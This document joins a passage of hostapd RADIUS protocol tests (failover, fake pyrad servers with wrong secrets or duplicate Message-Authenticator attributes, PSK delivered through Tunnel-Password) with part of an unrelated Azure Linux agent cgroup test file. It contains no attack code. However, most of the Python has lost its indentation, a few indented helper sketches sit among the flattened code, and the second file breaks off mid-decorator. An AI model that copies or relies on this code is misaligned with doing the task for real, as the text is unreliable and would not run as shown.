params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = "incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
a = "\xab\xcd"
secret = reply.secret
if self.t_events['long'].is_set():
p = b'\x10' + "0123456789abcdef" + 15 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p[0:16])
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
b = hashlib.md5(reply.secret + bytes(cc)).digest()
pp = bytearray(p[16:32])
bb = bytearray(b)
cc += bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
else:
p = b'\x08' + "12345678" + 7 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p)
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
reply.AddAttribute("Tunnel-Password", data)
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
t_events['long'].set()
dev[1].connect(ssid, psk="0123456789abcdef", scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
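# A hedged sketch of the Tunnel-Password obfuscation the fake server above
# applies (RFC 2868, section 3.5): prefix the password with its length,
# zero-pad to a 16-octet boundary, then XOR each block with an MD5 digest that
# is chained over the previous ciphertext block. Python 3 bytes semantics are
# assumed; the helper name is illustrative and not part of pyrad.
def encrypt_tunnel_password(password, salt, secret, authenticator):
    import hashlib
    data = bytes([len(password)]) + password
    data += b"\x00" * (-len(data) % 16)  # pad to a multiple of 16 octets
    digest = hashlib.md5(secret + authenticator + salt).digest()  # b1
    out = b""
    for i in range(0, len(data), 16):
        block = bytes(x ^ y for x, y in zip(data[i:i + 16], digest))
        out += block
        digest = hashlib.md5(secret + block).digest()  # chain on the ciphertext
    # Attribute value layout: Tag octet (0 here), 2-octet salt, ciphertext
    return b"\x00" + salt + out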
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
a = "\xab\xcd"
secret = reply.secret
p = b'\x07' + "1234567" + 8 * b'\x00'
b = hashlib.md5(secret + pkt.authenticator + a).digest()
pp = bytearray(p)
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
data = '\x00' + a + bytes(cc)
reply.AddAttribute("Tunnel-Password", data)
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret="radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = 'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = { "ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key" }
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
|
test_cgroupconfigurator.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
from __future__ import print_function
import os
import random
import re
import subprocess
import tempfile
import time
import threading
from azurelinuxagent.common.cgroup import CGroup
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator, UnexpectedProcessesInCGroupException
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.exception import CGroupsException
from azurelinuxagent.common.utils import shellutil
from tests.common.mock_cgroup_commands import mock_cgroup_commands
from tests.tools import AgentTestCase, patch, mock_sleep
from tests.utils.miscellaneous_tools import format_processes, wait_for
class CGroupConfiguratorSystemdTestCase(AgentTestCase):
@classmethod
def tearDownClass(cls):
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._instance from unit test for CGroupConfigurator
CGroupConfigurator._instance = None # pylint: disable=protected-access
AgentTestCase.tearDownClass()
@staticmethod
def _get_new_cgroup_configurator_instance(initialize=True, mock_commands=None, mock_files=None):
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._instance from unit test for CGroupConfigurator
CGroupConfigurator._instance = None # pylint: disable=protected-access
configurator = CGroupConfigurator.get_instance()
CGroupsTelemetry.reset()
if initialize:
with mock_cgroup_commands() as mocks:
if mock_files is not None:
for item in mock_files:
mocks.add_file(item[0], item[1])
if mock_commands is not None:
for command in mock_commands:
mocks.add_command(command[0], command[1])
configurator.initialize()
return configurator
def test_initialize_should_start_tracking_the_agent_cgroups(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'cpu' in cg.path),
"The Agent's CPU is not being tracked. Tracked: {0}".format(tracked))
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_start_tracking_other_controllers_when_one_is_not_present(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertFalse(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'cpu' in cg.path),
"The Agent's CPU should not be tracked. Tracked: {0}".format(tracked))
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_cpu_and_memory_controllers_are_not_present(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_agent_is_not_in_the_system_slice(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
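# A hedged helper sketch (illustrative; not part of the agent's API): derive
# the set of mounted cgroup controllers from "mount -t cgroup" output such as
# the mocks above. Whether 'cpu' and 'memory' appear in this set is what the
# preceding tests exercise when deciding which of the agent's cgroups can be
# tracked.
def _mounted_cgroup_controllers(mount_output):
    import re
    controllers = set()
    for line in mount_output.splitlines():
        match = re.search(r"on /sys/fs/cgroup/(\S+) type cgroup", line)
        if match:
            # co-mounted controllers are comma-separated, e.g. net_cls,net_prio
            controllers.update(match.group(1).split(","))
    return controllers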
def test_enable_and_disable_should_change_the_enabled_state_of_cgroups(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
self.assertTrue(configurator.enabled(), "CGroupConfigurator should be enabled by default")
configurator.disable()
self.assertFalse(configurator.enabled(), "disable() should disable the CGroupConfigurator")
configurator.enable()
self.assertTrue(configurator.enabled(), "enable() should enable the CGroupConfigurator")
def test_enable_should_raise_cgroups_exception_when_cgroups_are_not_supported(self):
with patch("azurelinuxagent.common.cgroupapi.CGroupsApi.cgroups_supported", return_value=False):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(initialize=False)
configurator.initialize()
with self.assertRaises(CGroupsException) as context_manager:
configurator.enable()
self.assertIn("Attempted to enable cgroups, but they are not supported on the current platform", str(context_manager.exception))
def test_disable_should_reset_tracked_cgroups(self):
# Start tracking a couple of dummy cgroups
CGroupsTelemetry.track_cgroup(CGroup("dummy", "/sys/fs/cgroup/memory/system.slice/dummy.service", "cpu"))
CGroupsTelemetry.track_cgroup(CGroup("dummy", "/sys/fs/cgroup/memory/system.slice/dummy.service", "memory"))
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().disable()
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
self.assertEqual(len(CGroupsTelemetry._tracked), 0) # pylint: disable=protected-access
def test_cgroup_operations_should_not_invoke_the_cgroup_api_when_cgroups_are_not_enabled(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
configurator.disable()
# List of operations to test, and the functions to mock used in order to do verifications
operations = [
[configurator.create_extensions_slice, "azurelinuxagent.common.cgroupapi.SystemdCgroupsApi.create_extensions_slice"],
]
for operation in operations:
with patch(operation[1]) as mock_cgroup_api_operation:
operation[0]()
self.assertEqual(mock_cgroup_api_operation.call_count, 0)
def test_cgroup_operations_should_log_a_warning_when_the_cgroup_api_raises_an_exception(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# cleanup_legacy_cgroups disables cgroups on error, so make disable() a no-op
with patch.object(configurator, "disable"):
# List of operations to test, and the functions to mock in order to raise exceptions
operations = [
[configurator.create_extensions_slice, "azurelinuxagent.common.cgroupapi.SystemdCgroupsApi.create_extensions_slice"],
]
def raise_exception(*_):
raise Exception("A TEST EXCEPTION")
for operation in operations:
with patch("azurelinuxagent.common.cgroupconfigurator.logger.warn") as mock_logger_warn:
with patch(operation[1], raise_exception):
operation[0]()
self.assertEqual(mock_logger_warn.call_count, 1)
args, _ = mock_logger_warn.call_args
message = args[0]
self.assertIn("A TEST EXCEPTION", message)
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_systemd_when_cgroups_are_not_enabled(self, _):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
configurator.disable()
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as patcher:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for args, _ in patcher.call_args_list if len(args) > 0 and "date" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertNotIn("systemd-run", command_calls[0], "The command should not have been invoked using systemd")
self.assertEqual(command_calls[0], "date", "The command line should not have been modified")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
